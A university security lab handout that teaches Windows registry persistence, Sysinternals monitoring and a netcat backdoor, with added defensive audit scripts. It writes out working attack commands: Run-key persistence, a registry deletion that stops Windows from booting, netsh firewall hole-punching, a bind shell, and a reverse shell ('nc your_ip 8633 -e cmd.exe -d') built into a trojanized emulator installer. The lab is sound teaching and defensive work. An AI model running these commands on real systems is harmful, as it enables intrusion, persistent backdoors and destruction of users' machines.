System Monitoring with Sys-Internals Lab


Page 1: System Monitoring with Sys-Internals Lab

ECE 4112 Internetwork Security Lab: System Monitoring with Sys-Internals and C Script Infection

Created by Jason Orlosky, Phillip Michael, and Todd Lyon

Date Assigned: Date Due: Last Edited:

Please read the entire lab and any extra materials carefully before starting. Be sure to start early enough so that you will have time to complete the lab. Answer ALL questions in the provided Answer Sheet and be sure you turn in ALL materials listed in the Turn-in Checklist on or before the Date Due.

Goal: This lab will help you understand how to infect a Windows system and then monitor the system with Sysinternals tools to detect the changes. It also reviews infecting a system with a small C program.

Summary: In this lab you will infect machines in various ways. First you will modify the registry by hand and then monitor the system to see what changes have been made. You will also learn how to render a Windows installation unbootable by deleting an essential registry key. Then you will investigate how a small C program infects a system by opening a firewall port for a Netcat listener.

Background: References on the registry and how it works can be found here:http://support.microsoft.com/default.aspx?scid=kb;en-us;256986

Prelab Questions: None

Lab Scenario: None


Section 1: Registry Manipulation and Having evil fun

Intro / Background

In this part of the lab you will be manipulating the Windows registry. The registry is the part of Windows that holds configuration for every installed program as well as vital system information; programs, drivers and system settings are configured by modifying its keys and values. It is also central to system startup, having replaced the .ini files, autoexec.bat and config.sys of earlier versions of Windows. You will create another copy of Windows XP in VMware to infect. You will see how to add registry values that keep a virus alive on a system and how to disable the OS by deleting an essential registry key. We will also see how to detect registry modifications and prevent their improper use. The tools used in this lab are Regedit, the Sysinternals RegMon utility, the REG command-line tool, batch files and the Jetico Firewall.

Note that the infection methods we review assume a virus has already been placed on the host system. Many current viruses and spyware use the Windows registry as their re-infection (persistence) point.

Modifying Registry Keys

Here are the REG commands that can be used from a command prompt (or from a batch file or program) to modify the registry. Note the terminology: REG works on keys (the "folders" seen in Regedit) and on values (the name/data pairs stored inside a key); /v names the value and /d supplies its data.

1) Adding a value: REG ADD RegistryPath /v Name /d Data

2) Modifying an existing value: REG ADD RegistryPath /v Name /d Data /f (there is no REG UPDATE operation; /f overwrites the existing value without prompting)

3) Deleting a key or a single value: REG DELETE RegistryPath [/v Name] [/f]

Additional commands for modifying or searching the registry can be found in Appendix B. Type "reg" at the command line for the list of operations the tool supports; typing an operation followed by "/?" (for example REG ADD /?) gives its parameters and usage examples.

Instead of typing the commands one by one at the command line, we can make use of Windows batch files. This also lets us modify values without opening a command window ourselves. A coder could build .exe files with the same functionality, but for this part of the lab batch files serve our purpose. The syntax of a batch file is explained in the sections describing the methods of infection.


First we need to create a new virtual copy of Windows, since we will eventually make the OS unbootable through the registry. Refer to Appendix C for how to make a copy of your Windows XP virtual machine.

After you have made a copy, boot it and proceed.

Sample Registry Modification:

The first registry location we will infect is the list of Windows startup items. To begin, look at the registry in its hierarchical folder layout. The top-level folders (HKEY_LOCAL_MACHINE and so on) are the root keys, each backed by a hive file on disk; the folders beneath them are keys, and the name/data pairs listed inside a key are its values.

1) Click Start -> Run, type regedit in the text field and press Enter. This program can be used on any Windows machine to modify registry keys and values in a GUI.

You should see the following window on your screen after hitting enter:

2) Navigate to the following key in the GUI by expanding the corresponding branches of the tree:

- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Here you should see several programs that are started automatically whenever a user logs on after boot. Values can be added to this key to start additional programs.

3) Add the following value to the registry via the command line (all on one line):

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v CMDstarter /d "C:\WINDOWS\SYSTEM32\cmd.exe"

/v specifies the value name and /d specifies its data (here, the program to launch).

After adding the value from the command line, refresh Regedit's view of the \Run key by pressing F5, or by clicking another key and then back on \Run.


Q1.1 List the keys you see in the registry including the key you just added. Be sure to show the names and data of each key.

Remove the new CMDstarter value from the registry using Regedit: right-click the value and click Delete, then click Yes when asked to confirm that you want to delete the value.

Keeping a Virus Alive on a System:

To show why adding values in this location is useful, we have written a batch file that installs a virus. Once on the system, the batch file installs and runs the virus from a separate file. Generally, a user can detect a running virus by opening Task Manager and looking for suspicious processes. The installation file can be disguised as something harmless that runs for only a few seconds to install and start the virus; this way an untrained administrator cannot tell why the virus keeps re-infecting the system.

1) Download the following files and folders from the NAS server onto your Windows XP virtual machine:

- HiddenFolder (contains Infect.bat and RenameMe.exe)
- Regmon.exe

2) Run Infect.bat by double-clicking it. This is the file that actually infects the system; it runs for only a fraction of a second before the viral code executes.

- Start Task Manager by right-clicking the taskbar and choosing Task Manager (this can also be done with Ctrl+Alt+Del).
- Notice the MrMalicious.exe process running in Task Manager. Ignore the inner workings of MrMalicious for now. The point is simply that Infect.bat adds a registry value that installs and runs the MrMalicious program. A hacker could add code to MrMalicious to harm the system; the MrMalicious.exe we have written simply consumes CPU time.

3) Open regedit again and navigate to the same \Run key we edited before. Notice that a value launching Infect.bat has been added.

4) Click Start -> My Computer, navigate to C:\Windows, find the executable called MrMalicious and delete it.

5) Restart the Windows XP virtual machine. The MrMalicious process should be running again just after startup. Notice that startup takes longer because MrMalicious is consuming CPU time.


6) Edit your Infect.bat file by right clicking and selecting edit from the menu. Review the code in the batch file to answer the following question.

Q1.2 Explain how the Infect.bat file infects the system so that the viral process “MrMalicious.exe” continues to be present even after it is deleted and the system is restarted. Use Appendix A and B as references if necessary.

7) Attachment #1: Using the commands in Appendix A and B, create a batch file that removes the existing value under the following key and adds a new value whose name is your name and which has no data:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Audio

Feel free to use the existing batch files as a reference. Attach the code for this batch file to the end of your lab.

Disabling antivirus and firewall programs with the registry

1) The registry can easily be used to disable programs that start with the computer. Download the Jetico Firewall (Jpfwall.exe) from the NAS server and install it by double-clicking the exe file. Choose all the default installation options, but do NOT restart when prompted at the end of the installation.

This installation will demonstrate how standard programs assert themselves on a system and start up.

2) Navigate to the \Run key and notice that the firewall has inserted a value that will start it after the system boots. To remove it without editing the registry by hand, a very simple scheme can be used to keep anything from starting on the host system.

- Some programs re-create their own \Run values the next time they are started (QuickTime's tray helper is a familiar example), so clearing the key once is not permanent. The .reg export route also needs care: a hacker could delete every value in the \Run key on his or her own machine and export the key to a .reg file, and double-clicking a .reg file merges it back into the registry, replacing values of the same name. Merging an export of an empty \Run key does not delete anything, however; a .reg file only removes entries when told to, with [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] to delete the whole key or "Name"=- under the key header to delete a single value.

3) Remove this registry value with Regedit and uninstall the firewall through Control Panel -> Add/Remove Programs.

Q1.3 How would someone remove solely the firewall key without knowing its title? Describe what a hacker’s software would have to do in order to prevent a specific program from starting up such as Norton Antivirus or ZoneAlarm Firewall. (Hint: The query command would be useful)
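As an added example for Q1.3 (not part of the original handout), the following Python script answers the question in code: it parses the output of REG QUERY for the Run keys, finds the value whose data launches a given program (jpfwall.exe here), and prints the REG DELETE commands that remove only that value. The REG QUERY text, the value names and the paths are constructed samples in the tab-separated layout of REG.EXE 3.0 on Windows XP; the same approach applies to the update/server.exe value in Section 3.

```python
"""Audit the Run/RunOnce keys from 'reg query' output and locate a program's autostart
entry by the program it launches rather than by the value name the vendor chose.
Added example for this lab (not part of the handout); the sample below is constructed
in the layout of REG.EXE 3.0 on Windows XP (key line, then tab-separated
'name<TAB>type<TAB>data' lines; later Windows versions use spaces instead of tabs)."""
import re

VALUE_RE = re.compile(r"^\s+(?P<name>.+?)\t(?P<type>REG_[A-Z_]+)\t(?P<data>.*)$")


def parse_reg_query(text):
    """Return {key: {value_name: (type, data)}} from the output of one or more
    'reg query <key>' runs concatenated together."""
    entries, current = {}, None
    for line in text.splitlines():
        if not line.strip() or line.startswith("!"):
            continue                      # blank lines and the "! REG.EXE VERSION" banner
        if not line[0].isspace():
            current = line.strip()        # an unindented line names the key
            entries.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            entries[current][m.group("name")] = (m.group("type"), m.group("data"))
    return entries


def launches(data, image_name):
    """True if the value data runs image_name, whether quoted, with arguments or bare."""
    pattern = r"(?:^|[\\/\"\s])" + re.escape(image_name) + r"(?=$|[\"\s])"
    return re.search(pattern, data, re.IGNORECASE) is not None


def find_by_image(entries, image_name):
    """(key, value_name) pairs whose data launches image_name."""
    return [(key, name) for key, values in entries.items()
            for name, (_, data) in values.items() if launches(data, image_name)]


def delete_commands(entries, image_name):
    """The 'reg delete' lines a removal script would run; /f skips the confirmation prompt."""
    return [f'reg delete "{key}" /v "{name}" /f' for key, name in find_by_image(entries, image_name)]


# Constructed sample output (value names and paths are illustrative, not the real
# Jetico or VMware entries).
SAMPLE = "\n".join([
    "! REG.EXE VERSION 3.0",
    "",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    "    VMware Tools\tREG_SZ\t" + r"C:\Program Files\VMware\VMware Tools\VMwareTray.exe",
    "    Jetico Personal Firewall\tREG_SZ\t" + r'"C:\Program Files\Jetico\jpfwall.exe" /startup',
    "    CMDstarter\tREG_SZ\t" + r"C:\WINDOWS\SYSTEM32\cmd.exe",
    "",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
    "    ctfmon.exe\tREG_SZ\t" + r"C:\WINDOWS\system32\ctfmon.exe",
])

if __name__ == "__main__":
    entries = parse_reg_query(SAMPLE)
    for cmd in delete_commands(entries, "jpfwall.exe"):
        print(cmd)
```

Run it against the saved output of reg query on the HKLM and HKCU \Run keys concatenated into one file. Matching on the executable name rather than the value name is what a hacker's software would do to stop a specific product from starting regardless of how the vendor named its entry, and it is equally what a cleanup script does to find an attacker's entry.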


Section 2: Detecting Registry Modification and Removing malicious keys:

We will use the Sysinternals RegMon utility to monitor our system's registry accesses and modifications. RegMon is an excellent tool because it shows every registry access with its time, process, request type, path, result and data. These attributes will be extremely valuable in determining which values have been added by a viral program.

1) Download the RegMon tool from the NAS and run it.

- The tool immediately begins capturing registry events. Most of these are legitimate accesses by Windows programs. To detect malicious registry changes we need to filter out the known-good processes so that only the unusual accesses remain in the log.

2) After about 20 seconds of capturing, click file and uncheck ‘capture events.’

- You should now have several hundred entries to start filtering with.
- The easiest way to begin filtering is by process name.

3) Click Options -> Filter/Highlight and the filter window will appear. Enter the names of processes to exclude from the display, such as "Explorer; svchost; winlogon"; the entries in a filter string are separated by semicolons. Begin capturing again by re-checking the 'Capture Events' option.


Keep adding to the filter string while registry reads and writes are occurring. You will see that fewer and fewer reads and writes show up on the list.

4) Once most of the very commonly occurring processes have been filtered out, run the Infect.bat file used in the beginning of the lab.

Screenshot #1: Search through the registry accesses and locate the malicious value. Highlight it in RegMon and take a screenshot. Include this with your lab for turn-in.

The easiest way to delete this maliciously added value is to use Regedit and navigate to its key. Do this now and delete the value using Delete from the right-click menu.
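The RegMon filtering above can also be reproduced offline on a saved RegMon log. The following Python script is an added example for this lab (not part of the handout or of RegMon itself): it applies a process exclusion list the way the Filter/Highlight dialog does, then keeps only successful writes (SetValue, CreateKey, DeleteValue, DeleteKey) under the Run and RunOnce keys. The log lines are a constructed sample in RegMon's tab-separated save layout.

```python
"""Triage a saved RegMon log: drop known-good processes, keep successful writes under
the autostart keys.  Added example for this lab (not part of the original handout or of
the Sysinternals tools); the log below is a constructed sample modelled on RegMon's
tab-separated 'Save' output (#, time, process:pid, request, path, result, other)."""
import re
from collections import namedtuple

Event = namedtuple("Event", "seq time process request path result other")

# Autostart keys this script watches: Run and RunOnce under HKLM and HKCU.
AUTOSTART_RE = re.compile(
    r"^HK(LM|CU)\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\",
    re.IGNORECASE,
)
# Request types that change the registry (reads are noise for this purpose).
WRITE_REQUESTS = {"SetValue", "CreateKey", "DeleteValue", "DeleteKey"}


def parse_regmon(text):
    """Turn the tab-separated log into Event tuples; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        fields = line.split("\t")
        if len(fields) < 6:
            continue
        seq, time, process, request, path, result = fields[:6]
        other = fields[6] if len(fields) > 6 else ""
        events.append(Event(int(seq), float(time), process, request, path, result, other))
    return events


def triage(events, exclude_processes):
    """Apply a process exclusion list (as the RegMon filter dialog does) and return the
    successful writes under autostart keys that survive it."""
    excluded = {p.lower() for p in exclude_processes}
    hits = []
    for ev in events:
        image = ev.process.split(":")[0].lower()      # "reg.exe:1604" -> "reg.exe"
        if image in excluded:
            continue
        if (ev.request in WRITE_REQUESTS and ev.result == "SUCCESS"
                and AUTOSTART_RE.match(ev.path)):
            hits.append(ev)
    return hits


# Constructed sample log: lines 1, 2 and 5 are ordinary Windows activity; lines 4 and 6
# are persistence writes (Infect.bat from Section 1, server.exe from Section 3).
SAMPLE_LOG = "\n".join("\t".join(f) for f in [
    ("1", "0.00012", "explorer.exe:1520", "QueryValue",
     r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop",
     "SUCCESS", r'"C:\Documents and Settings\lab\Desktop"'),
    ("2", "0.00340", "svchost.exe:892", "OpenKey",
     r"HKLM\SYSTEM\CurrentControlSet\Services\Dhcp", "SUCCESS", ""),
    ("3", "0.01002", "reg.exe:1604", "OpenKey",
     r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "SUCCESS", "Access: 0x2001F"),
    ("4", "0.01010", "reg.exe:1604", "SetValue",
     r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Infect",
     "SUCCESS", r'"C:\HiddenFolder\Infect.bat"'),
    ("5", "0.01100", "winlogon.exe:624", "QueryValue",
     r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",
     "SUCCESS", '"Explorer.exe"'),
    ("6", "0.02000", "reg.exe:1640", "SetValue",
     r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\update",
     "SUCCESS", r'"c:\windows\system32\server.exe"'),
])

if __name__ == "__main__":
    for hit in triage(parse_regmon(SAMPLE_LOG), ["explorer.exe", "svchost.exe", "winlogon.exe"]):
        print(f"#{hit.seq} {hit.process} {hit.request} {hit.path} -> {hit.other}")
```

Note that the writer in the sample is reg.exe, the child process the batch file spawns, not Infect.bat or cmd.exe, so an exclusion list that drops cmd.exe does not hide the write. Conversely, a virus that names its process svchost.exe would slip past a purely name-based exclusion, which is why the script filters on the registry path as well.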

Disabling the Operating system by deleting essential keys:

Note: This part of the lab is EXTREMELY malicious, do not do this to your friends!!!!!

Unfortunately for Microsoft, the registry is an essential point of operation for Windows: it carries configuration for every Windows component and service, and many of them cannot start without their keys. We will disable the operating system by removing one essential hive from the registry.


1) Start regedit.

2) Delete the following key, click OK if an error is generated, and reboot the VM:

- HKEY_LOCAL_MACHINE\SOFTWARE

This could also be done from the command line (add /f to skip the confirmation prompt):

REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE

The system will no longer boot. This is extremely effective because it will not even start in safe mode!!! A user or admin must repair or re-install the operating system from external bootable media.

Screenshot #2Take a screenshot of the failed system and attach it to your lab report. On the screenshot, describe what happened upon reboot.

To protect against this, a user should back up the whole registry to a separate disk. Users can back up the registry by exporting the major keys via regedit (or by keeping copies of the hive files themselves). With such a backup the keys can be restored from a bootable environment such as the Windows CD's Recovery Console, preserving the settings of the currently installed programs. Without a backup, the user is forced to repair or re-install the operating system, and neither repairing nor re-installing recovers the settings of programs that are not on the Windows CD, such as AOL Instant Messenger or Microsoft Office.

Q2.4 Why is it that not many hackers have used the registry to disable operating systems?

Section 3: Making use of the Windows registry and other command line options to exploit Windows.

In this section of the lab we will use basic C programming along with the Netcat tool to manipulate the Windows XP registry and the Windows XP SP2 firewall so that an administrative command shell on the Windows XP machine can be obtained over the network. For this section a new Windows XP virtual machine with SP2 installed is needed. To create it, follow the instructions from "LAB 1: OS Installation and Introduction to Security Tools" on creating a virtual machine; make sure an image of Windows XP with SP2 is available on the NAS or from the TA. We will also use our RedHat 7.2 virtual machine as the attacker, so make sure Netcat is installed on it as well. Information on installing Netcat on both the Windows XP and RedHat 7.2 virtual machines can be found in "LAB 6: Backdoors and Trojans"; a copy of that information is also provided in Appendix D, along with descriptions of the basic functions of Netcat. To begin, install Netcat in a new directory called C:\nc11nt on the Windows XP machine (Netcat should already be installed on the RedHat 7.2 machine; if not, follow the instructions in Appendix D), and power on both the RedHat 7.2 (IP 57.35.6.x+1) and Windows XP (IP 57.35.6.x+3) virtual machines.

Refamiliarizing Ourselves with Netcat and the Windows XP firewall

Before we review some basic Netcat commands, make sure the Windows XP firewall is enabled in your Windows XP virtual Machine. To do this, go to the control panel, and then access the option called “Windows Firewall”. Make sure that under the general tab, the firewall is set to “ON”, but that the “Don’t allow exceptions” box is not checked. Next take just a few moments to review the Netcat parameters in appendix D.

Before continuing with the lab, take a snapshot of the Windows XP SP2 virtual machine; we will revert to this snapshot later in this section. The option to do this should be at the top of the virtual machine window. If for some reason you are in a view in which you cannot access this option, ask a TA for assistance.

Now on the Windows XP machine go to Start -> Run and type "cmd". Change to the C:\nc11nt directory by typing cd \nc11nt. From the Netcat directory type "nc -L -p 8633 -e cmd.exe" (-L is the Windows build's "listen harder" mode, in which Netcat re-listens after each client disconnects, and -e hands the connection to cmd.exe). After running this command you should see a Windows Security Alert. This is because the firewall by default does not allow incoming traffic on port 8633, and Netcat is in listen mode expecting a connection on that port.

Screenshot #3: Take a screenshot of the Windows Security Alert asking if you want to keep blocking the nc program.

Now choose "Keep Blocking". The Netcat program is still listening on the port. On your 8.0 machine open Ethereal and start a packet capture in promiscuous mode. Switch to your RedHat 7.2 machine and from the terminal try the command "nc 57.35.6.x+3 59". Now stop the capture in Ethereal and view the packets.

Q3.1 What does ethereal show transpired between the 7.2 and Windows XP machines? Why did this occur?

Press Ctrl-C on both the Windows XP and RedHat 7.2 command lines. Now from the 7.2 command line run nmap against the Windows machine ("nmap 57.35.6.x+3"). Pick a port listed as open and run "nc -L -p open_port -e cmd.exe" from the Windows command line. Notice that no Windows Security Alert pops up. Now from the 7.2 machine run "nc 57.35.6.x+3 open_port". Notice that this still doesn't work. Even using Netcat's -s option (see man nc on the 7.2 machine for more information on -s) to bind a source port picked from the nmap output does not let the 7.2 machine connect. So now what?


From the Windows command line, type in the command “netsh firewall show portopening”.

Q3.2 What does this command show?

If there are any additional ports (ones not found from the port scan), they may be able to be used to gain access on with Netcat. To do this you can try to run “nc –L –p “additional_port” –e cmd.exe” from the Windows machine, and then nc 57.35.6.x+3 “additional_port” from the 7.2 machine. However to be safe, or rather to avoid any further Windows Security Alerts, it is better to just go ahead and set up the firewall to accept traffic to Netcat on a certain port. To start with, from the windows command line, type “netsh firewall” to view a list of commands available when editing or viewing the firewall. Now type “netsh firewall add”, doing this gives you possible parameters for the add command. As you can see by playing around with the various commands, many options are available to you, and the Windows XP firewall for SP2 can be manipulated however you choose.

When looking at the firewall options in the Control Panel earlier, you may remember the "Don't allow exceptions" checkbox. To turn it off, all you have to do is type "netsh firewall reset" and the Windows XP firewall is returned to its default state, which allows exceptions. Any program running with administrator rights can do this silently, which is a serious weakness of the firewall.

In our case we want to poke a hole through this firewall to allow access to the Windows XP machine via Netcat. To do this we will use the command:

netsh firewall add portopening protocol = ALL port = 8633 name = nc mode = ENABLE scope = ALL profile = ALL

Entering this one command from the Windows XP command line opens the firewall on port 8633 for both TCP and UDP, for any remote address (scope = ALL) and in both the Domain and Standard profiles (profile = ALL); the rule is simply named nc. Like every netsh firewall change, it only succeeds when executed with administrator rights.
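The 'show portopening' listing and the nmap results can be compared automatically. The Python script below is an added example for this lab (not part of the handout): it parses netsh firewall show portopening output, reports enabled TCP openings that the scan found nothing listening on (where, as shown above, a Netcat listener can bind without triggering a Security Alert), and reports rules whose name is not on the administrator's known list. The netsh text is a constructed sample in the XP SP2 layout, and the VM is assumed to use the Standard profile because it is not domain-joined.

```python
"""Compare 'netsh firewall show portopening' with what a port scan saw, to find enabled
openings that nothing is listening behind (a listener bound there raises no Security
Alert, as the lab shows) and openings whose name is not on the expected list.
Added example for this lab, not part of the handout; the text below is a constructed
sample in the layout of the XP SP2 command, and the VM is assumed to use the Standard
(non-domain) profile."""
import re
from collections import namedtuple

Opening = namedtuple("Opening", "profile port proto mode name")

PROFILE_RE = re.compile(r"^Port opening configuration for (?P<profile>\w+) profile:")
ROW_RE = re.compile(r"^(?P<port>\d+)\s+(?P<proto>TCP|UDP)\s+(?P<mode>Enable|Disable)\s+(?P<name>.+?)\s*$")


def parse_portopenings(text):
    """Rows of the 'show portopening' table, tagged with the profile they belong to."""
    rows, profile = [], None
    for line in text.splitlines():
        m = PROFILE_RE.match(line)
        if m:
            profile = m.group("profile")
            continue
        m = ROW_RE.match(line)
        if m and profile:
            rows.append(Opening(profile, int(m.group("port")), m.group("proto"),
                                m.group("mode"), m.group("name")))
    return rows


def unlistened_openings(openings, scanned_open_tcp, profile="Standard"):
    """Enabled TCP openings in the active profile that the scan did not report open:
    the firewall already admits traffic there, so a backdoor can bind without an alert."""
    enabled = {o.port for o in openings
               if o.profile == profile and o.proto == "TCP" and o.mode == "Enable"}
    return sorted(enabled - set(scanned_open_tcp))


def unexpected_openings(openings, expected_names, profile="Standard"):
    """Openings whose rule name is not on the administrator's known list (e.g. 'nc')."""
    known = {n.lower() for n in expected_names}
    return [o for o in openings if o.profile == profile and o.name.lower() not in known]


# Constructed sample of the command's output after the 'nc' hole has been added.
SAMPLE = """\
Port opening configuration for Domain profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP

Port opening configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service
8633   TCP       Enable   nc
8633   UDP       Enable   nc
"""

# Rule names the administrator expects to see (the default file-sharing exceptions).
KNOWN_RULES = ["NetBIOS Session Service", "SMB over TCP",
               "NetBIOS Name Service", "NetBIOS Datagram Service"]

if __name__ == "__main__":
    rows = parse_portopenings(SAMPLE)
    print("open in firewall but nothing answered the scan:",
          unlistened_openings(rows, scanned_open_tcp=[139, 445]))
    for o in unexpected_openings(rows, KNOWN_RULES):
        print("unexpected rule:", o)
```

Feed it the saved output of netsh firewall show portopening together with the TCP ports nmap reported open; an enabled opening that answered nothing in the scan is exactly the "additional port" the text above describes, and a rule name like nc is the trace the netsh add command leaves behind.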

After entering this command, let's retry our original attempt to gain access to the Windows machine. From the Windows XP command prompt, type "nc -L -p 8633 -e cmd.exe". Now from the 7.2 machine, type "nc 57.35.6.x+3 8633". SUCCESS!!! Notice that as soon as you close the command window on the Windows machine, you lose the connection on the 7.2 machine. To avoid this, from the Windows XP command prompt type "nc -L -p 8633 -e cmd.exe -d". Now close the command window and attempt to connect again. The -d option detaches Netcat from its console so it keeps running with no window. If you press Ctrl-Alt-Del in Windows, you can still find nc.exe on the Processes tab of Task Manager.

Using Knowledge of Netcat, the Windows Registry, the Windows Firewall, and Basic C Programming to Write an Exploit


At this point use the revert option on the top of the Windows XP SP2 virtual machine to revert Windows back to the state found towards the beginning of this section. This is done in order to restore the Windows XP firewall.

At this point in the lab, let us pretend we are a hacker with not-so-pleasant intentions operating from the RedHat 7.2 machine. The Windows XP machine is operated by a co-worker, schoolmate, roommate, or anyone you can think of who would be found on the same network as you (i.e. no router separates you). On the Windows XP machine, download the ZSNES.zip file from the NAS and put it in a new folder. This file is a self-extracting archive that installs the ZSNES Super Nintendo emulator (a freeware SNES emulator for the PC). In addition to installing the emulator, the self-extracting archive also installs Netcat and executes another program called installer.exe (also known as Trojan 8633; 8633 is the numeric representation of TODD, for Todd Lyon, the author of this exploit and of this section of the lab).

Thinking he is in for an exciting afternoon of playing Super Mario World, and possibly even a little Ogre Battle, our unsuspecting Windows XP user is more than happy to take and install the emulator you give him. After he installs it, you have administrative access to his machine for as long as you are on the same network with him (assuming he is not extremely knowledgeable about his registry or firewall, and does not decide to format his hard drive).

At this point, run the self-extracting ZSNES.zip file. You will notice a couple of OKs popping up in a command prompt, and then you will be in a folder with the newly installed ZSNES emulator.

From the RedHat 7.2 machine, type “nc 57.35.6.x+3 8633”. After this you will be in the Windows XP machines command prompt. Now, power off the Windows machine, and restart it.

Q3.3 What happens when you restart the Windows XP machine, and try to connect from the RedHat 7.2 machine with Netcat?

For Netcat to still be running in listen mode after rebooting the computer, the registry had to have been altered by the installer.exe file. But How?

Windows documents six registry keys for launching programs at startup. They are:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run - launches the program when that specific user logs in

HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce - launches the program the next time that user logs in, then the value is removed from the registry

HKLM\Software\Microsoft\Windows\CurrentVersion\Run - launches the program at every logon, for any user

HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce - launches the program at the next logon, then the value is removed from the registry

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices - launches a service automatically at system startup (e.g. AIM)

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce - launches a service automatically at the next system startup, then the value is removed from the registry

Note that the two RunServices keys are honoured only by Windows 95/98/Me; Windows XP ignores them, which is why the installer below uses HKLM\...\Run.

At this time download the files installer.c, and server.c and view the code used for this attack. Looking in the installer.c file, we can see that the entire program is made up of system calls.

Looking at the seventh system call, the command "reg add hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d c:\windows\system32\server.exe /f" is run. This adds a value named update to the HKLM\Software\Microsoft\Windows\CurrentVersion\Run key, so server.exe is launched automatically at every logon (/f overwrites any existing value of that name without prompting). Looking at server.c, you can see that all it does is run the command "nc -L -p 8633 -e cmd.exe -d".

From the exploited Windows machine, bring up a command prompt and run the command regedit.

Screenshot #4: Take a screenshot of the entry running server.exe highlighted in the registry editor.

Modifying The 8633 Exploit to Access a Machine outside of our Network

Using the same concept of giving the self-extracting archive to some unsuspecting Windows XP user, we want a way to access their machine when we are on a separate network from them. To do this we have to talk to their machine without the router dropping the packets we send. The easiest way is to have their machine initiate the TCP connection to ours (send the SYN), so their side opens the connection: a reverse shell. If we simply change the eighth system call of installer.c from "nc -L -p 8633 -e cmd.exe -d" to "nc your_ip 8633 -e cmd.exe -d" and have our machine waiting in listen mode on port 8633, then as long as no firewall blocks our port 8633 we will have a shell to their command prompt.

Because we are producing .exe files to attack a Windows system, installer.c needs to be compiled on Windows. Fortunately the Microsoft C/C++ Optimizing Compiler and Linker are freely available. The compiler can be found at http://msdn.microsoft.com/visualc/vctoolkit2003/. Microsoft's linker is available at http://www.microsoft.com/whdc/devtools/debugging/installx86.mspx.

However, for the purpose of this lab the compiler and debugger can both be found on the NAS. After installing these tools, compile the new code with "cl /Zi /MLd installer2.c", which produces installer2.exe (use /Fe<name> to choose a different output name). To create the self-extracting archive, Zip 2 Secure EXE was used (obtained from www.download.com).

Q3.4 How can you detect malicious code such as the 8633 program running on your computer?

Q3.5 What should you do avoid having malicious code such as this installed on your machine in the first place?

Section 4: More monitoring with Sys-internals

In this part of the lab you will monitor your system as a virus is unleashed. To monitor the virus we will use four utilities from http://sysinternals.com plus Ethereal. These utilities log registry accesses (RegMon), file accesses (FileMon) and network accesses (TDIMon), capture network traffic (Ethereal) and view live process information (Process Explorer).

Task Guide

1. Install WinPcap from the network share.
2. Copy the sysinternals folder to your desktop.
3. Start Ethereal capturing packets.
4. Open the sysinternals folder:
   a. Start Regmon, located in the ntregmon folder.
   b. Start Filemon, located in the ntfilemon folder.
   c. Start TDIMon, located in the tdimonnt folder.
   d. Start Process Explorer, located in the procexnt folder.
5. Execute the virus (document.pif).
6. Switch to Process Explorer.
   a. In Process Explorer find the virus.
      Q 4.1 - What is the name of the virus process loaded in memory?
   b. Right-click the virus process and select Properties, then select the TCP/IP tab.
      Q 4.2 - Is this process running a server?
      Q 4.3 - If yes, what port is it listening on?
      Close the properties window.
7. Let's find out what service is running on the port you just discovered.
   a. Open a command prompt (Start -> Run, "cmd").
      i. Telnet to the port, e.g. "telnet 127.0.0.1 21" if the port is 21.
         Q 4.4 - What type of server does this appear to be?
      ii. Next try FTPing to the port: run "ftp", then "o 127.0.0.1 21" at the ftp> prompt.
         Q 4.5 - Do you receive a login prompt?
      iii. If so, try logging in, then log out by typing "bye".
         S 4.1 - Take a screen capture of your ftp session.
   b. Right-click the virus process, select Kill Process, and close Process Explorer.
8. Switch to Ethereal.
   a. Stop the capture.
   b. Q 4.6 - What port number do you see a large number of connections to? Help: try the filter "tcp.flags == 2".
   c. Q 4.7 - Why do you think this is?
   d. Since you are not on a live Internet connection, open the virus3.pcap file. This file is a capture of the same virus on a live Internet connection.
      i. Q 4.8 - What port are connections established to? Help: try the filter "tcp.flags == 0x12", then right-click a packet and Follow TCP Stream on some of the conversations.
      ii. Q 4.9 - What is it connecting to these 2 different ports for?
9. Switch to the Registry Monitor.
   a. Q 4.10 - What is the virus repeatedly doing to the registry, and why do you think this is?
   b. S 4.2 - Take a screen capture of this.
10. Switch to Filemon and use it to find the answers to the following questions.
   i. Q 4.11 - What is the name and path of the executable created once document.pif is executed?
   ii. Q 4.12 - Three files are created to replicate the virus on the hard drive. Where are they and what are their names?
   iii. Q 4.13 - Why do you think the virus searches for files on the hard drive? Hint: it has to do with the traffic going to port 25.
11. Switch to TDIMon. The virus is trying to open a lot of connections to hosts.
   i. Q 4.14 - What port is it trying to connect to and why?
   ii. S 4.3 - Take a screen capture of this.
12. Remove the virus (or discard the VMware image): execute FixMytob.exe.

Q 4.15 - What is an advantage of active logging over active monitoring?
